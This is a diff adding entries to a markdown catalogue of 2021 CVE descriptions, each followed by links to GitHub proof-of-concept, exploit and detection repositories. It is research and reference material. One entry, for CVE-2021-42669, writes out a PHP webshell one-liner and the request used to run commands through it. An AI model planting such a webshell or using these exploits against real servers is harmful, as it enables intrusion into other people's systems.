+- [ijh4723/-zeroboo-Gohead-CVE-2021-42342-1](https://github.com/ijh4723/-zeroboo-Gohead-CVE-2021-42342-1)
+
+### CVE-2021-42362 (2021-11-12)
+
+The WordPress Popular Posts WordPress plugin is vulnerable to arbitrary file uploads due to insufficient input file type validation found in the ~/src/Image.php file which makes it possible for attackers with contributor level access and above to upload malicious files that can be used to obtain remote code execution, in versions up to and including 5.3.2.\n\n
+
+
+- [simonecris/CVE-2021-42362-PoC](https://github.com/simonecris/CVE-2021-42362-PoC)
+
+### CVE-2021-42392 (2022-01-07)
+
+The org.h2.util.JdbcUtils.getConnection method of the H2 database takes as parameters the class name of the driver and URL of the database. An attacker may pass a JNDI driver name and a URL leading to a LDAP or RMI servers, causing remote code execution. This can be exploited through various attack vectors, most notably through the H2 Console which leads to unauthenticated remote code execution.
+
+
+- [cybersecurityworks553/CVE-2021-42392-Detect](https://github.com/cybersecurityworks553/CVE-2021-42392-Detect)
+
+### CVE-2021-42558 (2022-01-12)
+
+An issue was discovered in CALDERA 2.8.1. It contains multiple reflected, stored, and self XSS vulnerabilities that may be exploited by authenticated and unauthenticated attackers.
+
+
+- [mbadanoiu/CVE-2021-42558](https://github.com/mbadanoiu/CVE-2021-42558)
+
+### CVE-2021-42559 (2022-01-12)
+
+An issue was discovered in CALDERA 2.8.1. It contains multiple startup "requirements" that execute commands when starting the server. Because these commands can be changed via the REST API, an authenticated user can insert arbitrary commands that will execute when the server is restarted.
+
+
+- [mbadanoiu/CVE-2021-42559](https://github.com/mbadanoiu/CVE-2021-42559)
+
+### CVE-2021-42560 (2022-01-12)
+
+An issue was discovered in CALDERA 2.9.0. The Debrief plugin receives base64 encoded "SVG" parameters when generating a PDF document. These SVG documents are parsed in an unsafe manner and can be leveraged for XXE attacks (e.g., File Exfiltration, Server Side Request Forgery, Out of Band Exfiltration, etc.).
+
+
+- [mbadanoiu/CVE-2021-42560](https://github.com/mbadanoiu/CVE-2021-42560)
+
+### CVE-2021-42561 (2022-01-12)
+
+An issue was discovered in CALDERA 2.8.1. When activated, the Human plugin passes the unsanitized name parameter to a python "os.system" function. This allows attackers to use shell metacharacters (e.g., backticks "``" or dollar parenthesis "$()" ) in order to escape the current command and execute arbitrary shell commands.
+
+
+- [mbadanoiu/CVE-2021-42561](https://github.com/mbadanoiu/CVE-2021-42561)
+
+### CVE-2021-42562 (2022-01-12)
+
+An issue was discovered in CALDERA 2.8.1. It does not properly segregate user privileges, resulting in non-admin users having access to read and modify configuration or other components that should only be accessible by admin users.
+
+
+- [mbadanoiu/CVE-2021-42562](https://github.com/mbadanoiu/CVE-2021-42562)
+
+### CVE-2021-42574 (2021-11-01)
+
+An issue was discovered in the Bidirectional Algorithm in the Unicode Specification through 14.0. It permits the visual reordering of characters via control sequences, which can be used to craft source code that renders different logic than the logical ordering of tokens ingested by compilers and interpreters. Adversaries can leverage this to encode source code for compilers accepting Unicode such that targeted vulnerabilities are introduced invisibly to human reviewers. NOTE: the Unicode Consortium offers the following alternative approach to presenting this concern. An issue is noted in the nature of international text that can affect applications that implement support for The Unicode Standard and the Unicode Bidirectional Algorithm (all versions). Due to text display behavior when text includes left-to-right and right-to-left characters, the visual order of tokens may be different from their logical order. Additionally, control characters needed to fully support the requirements of bidirectional text can further obfuscate the logical order of tokens. Unless mitigated, an adversary could craft source code such that the ordering of tokens perceived by human reviewers does not match what will be processed by a compiler/interpreter/etc. The Unicode Consortium has documented this class of vulnerability in its document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode Security Mechanisms, and in Unicode Standard Annex #31, Unicode Identifier and Pattern Syntax. Also, the BIDI specification allows applications to tailor the implementation in ways that can mitigate misleading visual reordering in program text; see HL4 in Unicode Standard Annex #9, Unicode Bidirectional Algorithm.
+
+
+- [shiomiyan/CVE-2021-42574](https://github.com/shiomiyan/CVE-2021-42574)
+- [hffaust/CVE-2021-42574_and_CVE-2021-42694](https://github.com/hffaust/CVE-2021-42574_and_CVE-2021-42694)
+- [simplylu/CVE-2021-42574](https://github.com/simplylu/CVE-2021-42574)
+- [maweil/bidi_char_detector](https://github.com/maweil/bidi_char_detector)
+- [pierDipi/unicode-control-characters-action](https://github.com/pierDipi/unicode-control-characters-action)
+- [waseeld/CVE-2021-42574](https://github.com/waseeld/CVE-2021-42574)
+- [tin-z/solidity_CVE-2021-42574-POC](https://github.com/tin-z/solidity_CVE-2021-42574-POC)
+
+### CVE-2021-42662 (2021-11-05)
+
+A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP/MySQL via the Holiday reason parameter. An attacker can leverage this vulnerability in order to run javascript commands on the web server surfers behalf, which can lead to cookie stealing and more.
+
+
+- [0xDeku/CVE-2021-42662](https://github.com/0xDeku/CVE-2021-42662)
+
+### CVE-2021-42663 (2021-11-05)
+
+An HTML injection vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP/MySQL via the msg parameter to /event-management/index.php. An attacker can leverage this vulnerability in order to change the visibility of the website. Once the target user clicks on a given link he will display the content of the HTML code of the attacker's choice.
+
+
+- [0xDeku/CVE-2021-42663](https://github.com/0xDeku/CVE-2021-42663)
+
+### CVE-2021-42664 (2021-11-05)
+
+A Stored Cross Site Scripting (XSS) Vulneraibiilty exists in Sourcecodester Engineers Online Portal in PHP via the (1) Quiz title and (2) quiz description parameters to add_quiz.php. An attacker can leverage this vulnerability in order to run javascript commands on the web server surfers behalf, which can lead to cookie stealing and more.
+
+
+- [0xDeku/CVE-2021-42664](https://github.com/0xDeku/CVE-2021-42664)
+
+### CVE-2021-42665 (2021-11-05)
+
+An SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the login form inside of index.php, which can allow an attacker to bypass authentication.
+
+
+- [0xDeku/CVE-2021-42665](https://github.com/0xDeku/CVE-2021-42665)
+
+### CVE-2021-42666 (2021-11-05)
+
+A SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the id parameter to quiz_question.php, which could let a malicious user extract sensitive data from the web server and in some cases use this vulnerability in order to get a remote code execution on the remote web server.
+
+
+- [0xDeku/CVE-2021-42666](https://github.com/0xDeku/CVE-2021-42666)
+
+### CVE-2021-42667 (2021-11-05)
+
+A SQL Injection vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP in event-management/views. An attacker can leverage this vulnerability in order to manipulate the sql query performed. As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server.
+
+
+- [0xDeku/CVE-2021-42667](https://github.com/0xDeku/CVE-2021-42667)
+
+### CVE-2021-42668 (2021-11-05)
+
+A SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the id parameter in the my_classmates.php web page.. As a result, an attacker can extract sensitive data from the web server and in some cases can use this vulnerability in order to get a remote code execution on the remote web server.
+
+
+- [0xDeku/CVE-2021-42668](https://github.com/0xDeku/CVE-2021-42668)
+
+### CVE-2021-42669 (2021-11-05)
+
+A file upload vulnerability exists in Sourcecodester Engineers Online Portal in PHP via dashboard_teacher.php, which allows changing the avatar through teacher_avatar.php. Once an avatar gets uploaded it is getting uploaded to the /admin/uploads/ directory, and is accessible by all users. By uploading a php webshell containing "<?php system($_GET["cmd"]); ?>" the attacker can execute commands on the web server with - /admin/uploads/php-webshell?cmd=id.
+
+
+- [0xDeku/CVE-2021-42669](https://github.com/0xDeku/CVE-2021-42669)
+
+### CVE-2021-42670 (2021-11-05)
+
+A SQL injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the id parameter to the announcements_student.php web page. As a result a malicious user can extract sensitive data from the web server and in some cases use this vulnerability in order to get a remote code execution on the remote web server.
+
+
+- [0xDeku/CVE-2021-42670](https://github.com/0xDeku/CVE-2021-42670)
+
+### CVE-2021-42671 (2021-11-05)
+
+An incorrect access control vulnerability exists in Sourcecodester Engineers Online Portal in PHP in nia_munoz_monitoring_system/admin/uploads. An attacker can leverage this vulnerability in order to bypass access controls and access all the files uploaded to the web server without the need of authentication or authorization.
+
+
+- [0xDeku/CVE-2021-42671](https://github.com/0xDeku/CVE-2021-42671)
+
+### CVE-2021-42694 (2021-11-01)
+
+An issue was discovered in the character definitions of the Unicode Specification through 14.0. The specification allows an adversary to produce source code identifiers such as function names using homoglyphs that render visually identical to a target identifier. Adversaries can leverage this to inject code via adversarial identifier definitions in upstream software dependencies invoked deceptively in downstream software. NOTE: the Unicode Consortium offers the following alternative approach to presenting this concern. An issue is noted in the nature of international text that can affect applications that implement support for The Unicode Standard (all versions). Unless mitigated, an adversary could produce source code identifiers using homoglyph characters that render visually identical to but are distinct from a target identifier. In this way, an adversary could inject adversarial identifier definitions in upstream software that are not detected by human reviewers and are invoked deceptively in downstream software. The Unicode Consortium has documented this class of security vulnerability in its document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode Security Mechanisms.
+
+
+- [simplylu/CVE-2021-42694](https://github.com/simplylu/CVE-2021-42694)
+
+### CVE-2021-42697 (2021-11-02)
+
+Akka HTTP 10.1.x before 10.1.15 and 10.2.x before 10.2.7 can encounter stack exhaustion while parsing HTTP headers, which allows a remote attacker to conduct a Denial of Service attack by sending a User-Agent header with deeply nested comments.
+
+
+- [cxosmo/CVE-2021-42697](https://github.com/cxosmo/CVE-2021-42697)
+
+### CVE-2021-42717 (2021-12-07)
+
+ModSecurity 3.x through 3.0.5 mishandles excessively nested JSON objects. Crafted JSON objects with nesting tens-of-thousands deep could result in the web server being unable to service legitimate requests. Even a moderately large (e.g., 300KB) HTTP request can occupy one of the limited NGINX worker processes for minutes and consume almost all of the available CPU on the machine. Modsecurity 2 is similarly vulnerable: the affected versions include 2.8.0 through 2.9.4.
+
+
+- [EkamSinghWalia/Detection-and-Mitigation-script-for-CVE-2021-42717](https://github.com/EkamSinghWalia/Detection-and-Mitigation-script-for-CVE-2021-42717)
+
+### CVE-2021-42756 (2023-02-16)
+
+Multiple stack-based buffer overflow vulnerabilities [CWE-121] in the proxy daemon of FortiWeb 5.x all versions, 6.0.7 and below, 6.1.2 and below, 6.2.6 and below, 6.3.16 and below, 6.4 all versions may allow an unauthenticated remote attacker to achieve arbitrary code execution via specifically crafted HTTP requests.
+
+
+- [3ndorph1n/CVE-2021-42756](https://github.com/3ndorph1n/CVE-2021-42756)
+
+### CVE-2021-42835 (2021-12-08)
+
+An issue was discovered in Plex Media Server through 1.24.4.5081-e362dc1ee. An attacker (with a foothold in a endpoint via a low-privileged user account) can access the exposed RPC service of the update service component. This RPC functionality allows the attacker to interact with the RPC functionality and execute code from a path of his choice (local, or remote via SMB) because of a TOCTOU race condition. This code execution is in the context of the Plex update service (which runs as SYSTEM).
+
+
+- [netanelc305/PlEXcalaison](https://github.com/netanelc305/PlEXcalaison)
+
+### CVE-2021-42913 (2021-12-20)
+
+The SyncThru Web Service on Samsung SCX-6x55X printers allows an attacker to gain access to a list of SMB users and cleartext passwords by reading the HTML source code. Authentication is not required.
+
+
+- [kernel-cyber/CVE-2021-42913](https://github.com/kernel-cyber/CVE-2021-42913)
+
+### CVE-2021-42948 (2022-09-16)
+
+HotelDruid Hotel Management Software v3.0.3 and below was discovered to have exposed session tokens in multiple links via GET parameters, allowing attackers to access user session id's.
+
+
+- [dhammon/HotelDruid-CVE-2021-42948](https://github.com/dhammon/HotelDruid-CVE-2021-42948)
+
+### CVE-2021-42949 (2022-09-16)
+
+The component controlla_login function in HotelDruid Hotel Management Software v3.0.3 generates a predictable session token, allowing attackers to bypass authentication via bruteforce attacks.
+
+
+- [dhammon/HotelDruid-CVE-2021-42949](https://github.com/dhammon/HotelDruid-CVE-2021-42949)
+
+### CVE-2021-43008 (2022-04-05)
+
+Improper Access Control in Adminer versions 1.12.0 to 4.6.2 (fixed in version 4.6.3) allows an attacker to achieve Arbitrary File Read on the remote server by requesting the Adminer to connect to a remote MySQL database.
+
+
+- [p0dalirius/CVE-2021-43008-AdminerRead](https://github.com/p0dalirius/CVE-2021-43008-AdminerRead)
+
+### CVE-2021-43032 (2021-11-03)
+
+In XenForo through 2.2.7, a threat actor with access to the admin panel can create a new Advertisement via the Advertising function, and save an XSS payload in the body of the HTML document. This payload will execute globally on the client side.
+
+
+- [SakuraSamuraii/CVE-2021-43032](https://github.com/SakuraSamuraii/CVE-2021-43032)
+
+### CVE-2021-43129 (2022-04-19)
+
+A bypass exists for Desire2Learn/D2L Brightspace’s “Disable Right Click” option in the quizzing feature, which allows a quiz-taker to access print and copy functionality via the browser’s right click menu even when “Disable Right Click” is enabled on the quiz.
+
+
+- [Skotizo/CVE-2021-43129](https://github.com/Skotizo/CVE-2021-43129)
+
+### CVE-2021-43141 (2021-11-03)
+
+Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Simple Subscription Website 1.0 via the id parameter in plan_application.
+
+
+- [Jeromeyoung/CVE-2021-43141](https://github.com/Jeromeyoung/CVE-2021-43141)
+
+### CVE-2021-43150
+- [Zeyad-Azima/OpayForMe](https://github.com/Zeyad-Azima/OpayForMe)
+
+### CVE-2021-43217 (2021-12-15)
+
+Windows Encrypting File System (EFS) Remote Code Execution Vulnerability
+
+
+- [JolynNgSC/EFS_CVE-2021-43217](https://github.com/JolynNgSC/EFS_CVE-2021-43217)
+
+### CVE-2021-43224 (2021-12-15)
+
+Windows Common Log File System Driver Information Disclosure Vulnerability
+
+
+- [KaLendsi/CVE-2021-43224-POC](https://github.com/KaLendsi/CVE-2021-43224-POC)
+
+### CVE-2021-43226 (2021-12-15)
+
+Windows Common Log File System Driver Elevation of Privilege Vulnerability
+
+
+- [Rosayxy/cve-2021-43226PoC](https://github.com/Rosayxy/cve-2021-43226PoC)
+
+### CVE-2021-43229 (2021-12-15)
+
+Windows NTFS Elevation of Privilege Vulnerability
+
+
+- [Citizen13X/CVE-2021-43229](https://github.com/Citizen13X/CVE-2021-43229)
+
+### CVE-2021-43258 (2022-11-23)
+
+CartView.php in ChurchInfo 1.3.0 allows attackers to achieve remote code execution through insecure uploads. This requires authenticated access tot he ChurchInfo application. Once authenticated, a user can add names to their cart, and compose an email. Uploading an attachment for the email stores the attachment on the site in the /tmp_attach/ folder where it can be accessed with a GET request. There are no limitations on files that can be attached, allowing for malicious PHP code to be uploaded and interpreted by the server.
+
+
+- [MRvirusIR/CVE-2021-43258](https://github.com/MRvirusIR/CVE-2021-43258)
+
+### CVE-2021-43267 (2021-11-02)
+
+An issue was discovered in net/tipc/crypto.c in the Linux kernel before 5.14.16. The Transparent Inter-Process Communication (TIPC) functionality allows remote attackers to exploit insufficient validation of user-supplied sizes for the MSG_CRYPTO message type.
+
+
+- [DarkSprings/CVE-2021-43267-POC](https://github.com/DarkSprings/CVE-2021-43267-POC)
+- [zzhacked/CVE-2021-43267](https://github.com/zzhacked/CVE-2021-43267)
+
+### CVE-2021-43287 (2022-04-14)
+
+An issue was discovered in ThoughtWorks GoCD before 21.3.0. The business continuity add-on, which is enabled by default, leaks all secrets known to the GoCD server to unauthenticated attackers.
+
+
+- [Wrin9/CVE-2021-43287](https://github.com/Wrin9/CVE-2021-43287)
+
+### CVE-2021-43297 (2022-01-10)
+
+A deserialization vulnerability existed in dubbo hessian-lite 3.2.11 and its earlier versions, which could lead to malicious code execution. Most Dubbo users use Hessian2 as the default serialization/deserialization protocol, during Hessian catch unexpected exceptions, Hessian will log out some imformation for users, which may cause remote command execution. This issue affects Apache Dubbo Apache Dubbo 2.6.x versions prior to 2.6.12; Apache Dubbo 2.7.x versions prior to 2.7.15; Apache Dubbo 3.0.x versions prior to 3.0.5.
+
+
+- [bitterzzZZ/CVE-2021-43297-POC](https://github.com/bitterzzZZ/CVE-2021-43297-POC)
+- [longofo/Apache-Dubbo-Hessian2-CVE-2021-43297](https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297)
+
+### CVE-2021-43326 (2021-12-15)
+
+Automox Agent before 32 on Windows incorrectly sets permissions on a temporary directory.
+
+
+- [gfoss/CVE-2021-43326_Exploit](https://github.com/gfoss/CVE-2021-43326_Exploit)
+
+### CVE-2021-43408 (2021-10-19)
+
+The "Duplicate Post" WordPress plugin up to and including version 1.1.9 is vulnerable to SQL Injection. SQL injection vulnerabilities occur when client supplied data is included within an SQL Query insecurely. SQL Injection can typically be exploited to read, modify and delete SQL table data. In many cases it also possible to exploit features of SQL server to execute system commands and/or access the local file system. This particular vulnerability can be exploited by any authenticated user who has been granted access to use the Duplicate Post plugin. By default, this is limited to Administrators, however the plugin presents the option to permit access to the Editor, Author, Contributor and Subscriber roles.
+
+
+- [tuannq2299/CVE-2021-43408](https://github.com/tuannq2299/CVE-2021-43408)
+
+### CVE-2021-43469 (2021-12-06)
+
+VINGA WR-N300U 77.102.1.4853 is affected by a command execution vulnerability in the goahead component.
+
+
+- [badboycxcc/CVE-2021-43469](https://github.com/badboycxcc/CVE-2021-43469)
+
+### CVE-2021-43471 (2021-12-06)
+
+In Canon LBP223 printers, the System Manager Mode login does not require an account password or PIN. An attacker can remotely shut down the device after entering the background, creating a denial of service vulnerability.
+
+
+- [cxaqhq/CVE-2021-43471](https://github.com/cxaqhq/CVE-2021-43471)
+
+### CVE-2021-43503
+- [guoyanan1g/Laravel-vul](https://github.com/guoyanan1g/Laravel-vul)
+- [kang8/CVE-2021-43503](https://github.com/kang8/CVE-2021-43503)
+
+### CVE-2021-43515 (2022-04-08)
+
+CSV Injection (aka Excel Macro Injection or Formula Injection) exists in creating new timesheet in Kimai. By filling the Description field with malicious payload, it will be mistreated while exporting to a CSV file.
+
+
+- [ixSly/CVE-2021-43515](https://github.com/ixSly/CVE-2021-43515)
+
+### CVE-2021-43530 (2021-12-08)
+
+A Universal XSS vulnerability was present in Firefox for Android resulting from improper sanitization when processing a URL scanned from a QR code. *This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox < 94.
+
+
+- [hfh86/CVE-2021-43530-UXSS-On-QRcode-Reader-](https://github.com/hfh86/CVE-2021-43530-UXSS-On-QRcode-Reader-)
+
+### CVE-2021-43557 (2021-11-22)
+
+The uri-block plugin in Apache APISIX before 2.10.2 uses $request_uri without verification. The $request_uri is the full original request URI without normalization. This makes it possible to construct a URI to bypass the block list on some occasions. For instance, when the block list contains "^/internal/", a URI like `//internal/` can be used to bypass it. Some other plugins also have the same issue. And it may affect the developer's custom plugin.
+
+
+- [xvnpw/k8s-CVE-2021-43557-poc](https://github.com/xvnpw/k8s-CVE-2021-43557-poc)
+
+### CVE-2021-43609 (2023-11-08)
+
+An issue was discovered in Spiceworks Help Desk Server before 1.3.3. A Blind Boolean SQL injection vulnerability within the order_by_for_ticket function in app/models/reporting/database_query.rb allows an authenticated attacker to execute arbitrary SQL commands via the sort parameter. This can be leveraged to leak local files from the host system, leading to remote code execution (RCE) through deserialization of malicious data.
+
+
+- [d5sec/CVE-2021-43609-POC](https://github.com/d5sec/CVE-2021-43609-POC)
+
+### CVE-2021-43616 (2021-11-13)
+
+The npm ci command in npm 7.x and 8.x through 8.1.3 proceeds with an installation even if dependency information in package-lock.json differs from package.json. This behavior is inconsistent with the documentation, and makes it easier for attackers to install malware that was supposed to have been blocked by an exact version match requirement in package-lock.json. NOTE: The npm team believes this is not a vulnerability. It would require someone to socially engineer package.json which has different dependencies than package-lock.json. That user would have to have file system or write access to change dependencies. The npm team states preventing malicious actors from socially engineering or gaining file system access is outside the scope of the npm CLI.
+
+
+- [icatalina/CVE-2021-43616](https://github.com/icatalina/CVE-2021-43616)
+
+### CVE-2021-43617 (2021-11-14)
+
+Laravel Framework through 8.70.2 does not sufficiently block the upload of executable PHP content because Illuminate/Validation/Concerns/ValidatesAttributes.php lacks a check for .phar files, which are handled as application/x-httpd-php on systems based on Debian. NOTE: this CVE Record is for Laravel Framework, and is unrelated to any reports concerning incorrectly written user applications for image upload.
+
+
+- [kombat1/CVE-2021-43617](https://github.com/kombat1/CVE-2021-43617)
+- [aweiiy/CVE-2021-43617](https://github.com/aweiiy/CVE-2021-43617)
+- [Sybelle03/CVE-2021-43617](https://github.com/Sybelle03/CVE-2021-43617)
+
+### CVE-2021-43657 (2022-12-22)
+
+A Stored Cross-site scripting (XSS) vulnerability via MAster.php in Sourcecodetester Simple Client Management System (SCMS) 1.0 allows remote attackers to inject arbitrary web script or HTML via the vulnerable input fields.
+
+
+- [c0n5n3d/CVE-2021-43657](https://github.com/c0n5n3d/CVE-2021-43657)
+
+### CVE-2021-43778 (2021-11-24)
+
+Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. This issue was patched in version 2.6.1. As a workaround, delete the `front/send.php` file.
+
+
+- [AK-blank/CVE-2021-43778](https://github.com/AK-blank/CVE-2021-43778)
+
+### CVE-2021-43789 (2021-12-07)
+
+PrestaShop is an Open Source e-commerce web application. Versions of PrestaShop prior to 1.7.8.2 are vulnerable to blind SQL injection using search filters with `orderBy` and `sortOrder` parameters. The problem is fixed in version 1.7.8.2.
+
+
+- [numanturle/CVE-2021-43789](https://github.com/numanturle/CVE-2021-43789)
+
+### CVE-2021-43798 (2021-12-07)
+
+Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) iss vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: `<grafana_host_url>/public/plugins//`, where is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.
+
+
+- [taythebot/CVE-2021-43798](https://github.com/taythebot/CVE-2021-43798)
+- [zer0yu/CVE-2021-43798](https://github.com/zer0yu/CVE-2021-43798)
+- [jas502n/Grafana-CVE-2021-43798](https://github.com/jas502n/Grafana-CVE-2021-43798)
+- [ScorpionsMAX/CVE-2021-43798-Grafana-POC](https://github.com/ScorpionsMAX/CVE-2021-43798-Grafana-POC)
+- [Mr-xn/CVE-2021-43798](https://github.com/Mr-xn/CVE-2021-43798)
+- [asaotomo/CVE-2021-43798-Grafana-Exp](https://github.com/asaotomo/CVE-2021-43798-Grafana-Exp)
+- [A-D-Team/grafanaExp](https://github.com/A-D-Team/grafanaExp)
+- [kenuosec/grafanaExp](https://github.com/kenuosec/grafanaExp)
+- [M0ge/CVE-2021-43798-grafana_fileread](https://github.com/M0ge/CVE-2021-43798-grafana_fileread)
+- [JiuBanSec/Grafana-CVE-2021-43798](https://github.com/JiuBanSec/Grafana-CVE-2021-43798)
+- [lfz97/CVE-2021-43798-Grafana-File-Read](https://github.com/lfz97/CVE-2021-43798-Grafana-File-Read)
+- [s1gh/CVE-2021-43798](https://github.com/s1gh/CVE-2021-43798)
+- [z3n70/CVE-2021-43798](https://github.com/z3n70/CVE-2021-43798)
+- [Mo0ns/Grafana_POC-CVE-2021-43798](https://github.com/Mo0ns/Grafana_POC-CVE-2021-43798)
+- [fanygit/Grafana-CVE-2021-43798Exp](https://github.com/fanygit/Grafana-CVE-2021-43798Exp)
+- [LongWayHomie/CVE-2021-43798](https://github.com/LongWayHomie/CVE-2021-43798)
+- [pedrohavay/exploit-grafana-CVE-2021-43798](https://github.com/pedrohavay/exploit-grafana-CVE-2021-43798)
+- [gixxyboy/CVE-2021-43798](https://github.com/gixxyboy/CVE-2021-43798)
+- [Ryze-T/CVE-2021-43798](https://github.com/Ryze-T/CVE-2021-43798)
+- [k3rwin/CVE-2021-43798-Grafana](https://github.com/k3rwin/CVE-2021-43798-Grafana)
+- [gps1949/CVE-2021-43798](https://github.com/gps1949/CVE-2021-43798)
+- [halencarjunior/grafana-CVE-2021-43798](https://github.com/halencarjunior/grafana-CVE-2021-43798)
+- [light-Life/CVE-2021-43798](https://github.com/light-Life/CVE-2021-43798)
+- [rnsss/CVE-2021-43798-poc](https://github.com/rnsss/CVE-2021-43798-poc)
+- [rodpwn/CVE-2021-43798-mass_scanner](https://github.com/rodpwn/CVE-2021-43798-mass_scanner)
+- [aymenbouferroum/CVE-2021-43798_exploit](https://github.com/aymenbouferroum/CVE-2021-43798_exploit)
+- [Jroo1053/GrafanaDirInclusion](https://github.com/Jroo1053/GrafanaDirInclusion)
+- [yasindce1998/grafana-cve-2021-43798](https://github.com/yasindce1998/grafana-cve-2021-43798)
+- [BJLIYANLIANG/CVE-2021-43798-Grafana-File-Read](https://github.com/BJLIYANLIANG/CVE-2021-43798-Grafana-File-Read)
+- [lalkaltest/CVE-2021-43798](https://github.com/lalkaltest/CVE-2021-43798)
+- [hupe1980/CVE-2021-43798](https://github.com/hupe1980/CVE-2021-43798)
+- [G01d3nW01f/CVE-2021-43798](https://github.com/G01d3nW01f/CVE-2021-43798)
+- [mauricelambert/LabAutomationCVE-2021-43798](https://github.com/mauricelambert/LabAutomationCVE-2021-43798)
+- [FAOG99/GrafanaDirectoryScanner](https://github.com/FAOG99/GrafanaDirectoryScanner)
+- [nuker/CVE-2021-43798](https://github.com/nuker/CVE-2021-43798)
+- [victorhorowitz/grafana-exploit-CVE-2021-43798](https://github.com/victorhorowitz/grafana-exploit-CVE-2021-43798)
+- [katseyres2/CVE-2021-43798](https://github.com/katseyres2/CVE-2021-43798)
+- [Iris288/CVE-2021-43798](https://github.com/Iris288/CVE-2021-43798)
+- [wagneralves/CVE-2021-43798](https://github.com/wagneralves/CVE-2021-43798)
+- [K3ysTr0K3R/CVE-2021-43798-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-43798-EXPLOIT)
+- [ticofookfook/CVE-2021-43798](https://github.com/ticofookfook/CVE-2021-43798)
+- [xchg-rax-rax/CVE-2021-43798](https://github.com/xchg-rax-rax/CVE-2021-43798)
+- [topyagyuu/CVE-2021-43798](https://github.com/topyagyuu/CVE-2021-43798)
+- [MalekAlthubiany/CVE-2021-43798](https://github.com/MalekAlthubiany/CVE-2021-43798)
+
+### CVE-2021-43799 (2022-01-25)
+
+Zulip is an open-source team collaboration tool. Zulip Server installs RabbitMQ for internal message passing. In versions of Zulip Server prior to 4.9, the initial installation (until first reboot, or restart of RabbitMQ) does not successfully limit the default ports which RabbitMQ opens; this includes port 25672, the RabbitMQ distribution port, which is used as a management port. RabbitMQ's default "cookie" which protects this port is generated using a weak PRNG, which limits the entropy of the password to at most 36 bits; in practicality, the seed for the randomizer is biased, resulting in approximately 20 bits of entropy. If other firewalls (at the OS or network level) do not protect port 25672, a remote attacker can brute-force the 20 bits of entropy in the "cookie" and leverage it for arbitrary execution of code as the rabbitmq user. They can also read all data which is sent through RabbitMQ, which includes all message traffic sent by users. Version 4.9 contains a patch for this vulnerability. As a workaround, ensure that firewalls prevent access to ports 5672 and 25672 from outside the Zulip server.
+
+
+- [scopion/CVE-2021-43799](https://github.com/scopion/CVE-2021-43799)
+
+### CVE-2021-43811 (2021-12-08)
+
+Sockeye is an open-source sequence-to-sequence framework for Neural Machine Translation built on PyTorch. Sockeye uses YAML to store model and data configurations on disk. Versions below 2.3.24 use unsafe YAML loading, which can be made to execute arbitrary code embedded in config files. An attacker can add malicious code to the config file of a trained model and attempt to convince users to download and run it. If users run the model, the embedded code will run locally. The issue is fixed in version 2.3.24.
+
+
+- [s-index/CVE-2021-43811](https://github.com/s-index/CVE-2021-43811)
+
+### CVE-2021-43821 (2021-12-14)
+
+Opencast is an Open Source Lecture Capture & Video Management for Education. Opencast before version 9.10 or 10.6 allows references to local file URLs in ingested media packages, allowing attackers to include local files from Opencast's host machines and making them available via the web interface. Before Opencast 9.10 and 10.6, Opencast would open and include local files during ingests. Attackers could exploit this to include most local files the process has read access to, extracting secrets from the host machine. An attacker would need to have the privileges required to add new media to exploit this. But these are often widely given. The issue has been fixed in Opencast 10.6 and 11.0. You can mitigate this issue by narrowing down the read access Opencast has to files on the file system using UNIX permissions or mandatory access control systems like SELinux. This cannot prevent access to files Opencast needs to read though and we highly recommend updating.
+
+
+- [Jackey0/opencast-CVE-2021-43821-env](https://github.com/Jackey0/opencast-CVE-2021-43821-env)
+
+### CVE-2021-43848 (2022-02-01)
+
+h2o is an open source http server. In code prior to the `8c0eca3` commit h2o may attempt to access uninitialized memory. When receiving QUIC frames in certain order, HTTP/3 server-side implementation of h2o can be misguided to treat uninitialized memory as HTTP/3 frames that have been received. When h2o is used as a reverse proxy, an attacker can abuse this vulnerability to send internal state of h2o to backend servers controlled by the attacker or third party. Also, if there is an HTTP endpoint that reflects the traffic sent from the client, an attacker can use that reflector to obtain internal state of h2o. This internal state includes traffic of other connections in unencrypted form and TLS session tickets. This vulnerability exists in h2o server with HTTP/3 support, between commit 93af138 and d1f0f65. None of the released versions of h2o are affected by this vulnerability. There are no known workarounds. Users of unreleased versions of h2o using HTTP/3 are advised to upgrade immediately.
+
+
+- [neex/hui2ochko](https://github.com/neex/hui2ochko)
+
+### CVE-2021-43857 (2021-12-27)
+
+Gerapy is a distributed crawler management framework. Gerapy prior to version 0.9.8 is vulnerable to remote code execution, and this issue is patched in version 0.9.8.
+
+
+- [LongWayHomie/CVE-2021-43857](https://github.com/LongWayHomie/CVE-2021-43857)
+- [lowkey0808/CVE-2021-43857](https://github.com/lowkey0808/CVE-2021-43857)
+
+### CVE-2021-43858 (2021-12-27)
+
+MinIO is a Kubernetes native application for cloud storage. Prior to version `RELEASE.2021-12-27T07-23-18Z`, a malicious client can hand-craft an HTTP API call that allows for updating policy for a user and gaining higher privileges. The patch in version `RELEASE.2021-12-27T07-23-18Z` changes the accepted request body type and removes the ability to apply policy changes through this API. There is a workaround for this vulnerability: Changing passwords can be disabled by adding an explicit `Deny` rule to disable the API for users.
+
+
